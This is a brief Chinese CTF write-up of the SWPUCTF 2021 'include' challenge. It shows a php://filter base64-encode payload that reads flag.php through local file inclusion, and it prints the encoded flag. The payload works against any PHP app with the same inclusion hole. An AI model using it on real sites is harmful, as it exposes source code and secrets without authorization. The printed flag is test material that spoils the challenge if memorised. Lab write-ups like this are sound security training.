[SWPUCTF 2021 新生赛]include

传入一个file试试,尝试/?file=3

提示flag 在flag.php中,但是无法直接读出flag.php - 原因是由于flag.php中不具有echo相对应的输出语句,应该是仅具有$flag变量的定义。因此,采用php伪协议进行输出

?file=php://filter/convert.base64-encode/resource=flag.php

得到PD9waHANCiRmbGFnPSdOU1NDVEZ7Njk4MGY2OTctNzE0OC00M2FlLWFjZmUtNjk2OWZjMzdkNTgwfSc7

进行base64解密即可

相关推荐
骥龙1 天前
3.11、终端安全最后一道屏障:EDR 原理与 Evil-WinRM 实战
网络·安全·网络安全
Suckerbin1 天前
ColddBox: Easy靶场渗透
安全·web安全·网络安全
Bruce_Liuxiaowei1 天前
Windows注册表安全浅析:核心键值解析与防护策略
windows·安全·网络安全
虹科网络安全1 天前
艾体宝新闻 | Python高危预警:urllib3两大漏洞曝光,引发客户端DoS风险
网络安全
独行soc1 天前
2025年渗透测试面试题总结-276(题目+回答)
android·网络·python·安全·web安全·网络安全·渗透测试
白帽子黑客杰哥1 天前
CTF Web题目常用考点与解题技巧合集
前端·数据库·web安全·网络安全·ctf·信息收集
Whoami!1 天前
❽⁄₅ ⟦ OSCP ⬖ 研记 ⟧ 修改漏洞利用脚本 ➱ 分析漏洞利用脚本(.c){下}
网络安全·信息安全·漏洞利用·缓冲区溢出
小白勇闯网安圈1 天前
wife_wife、题目名称-文件包含、FlatScience
javascript·python·网络安全·web·原型模式
云计算练习生2 天前
渗透测试行业术语扫盲(第六篇)—— Web安全专用类术语
web安全·网络安全·信息安全·渗透测试术语
三七吃山漆2 天前
攻防世界——comment
android·python·web安全·网络安全·ctf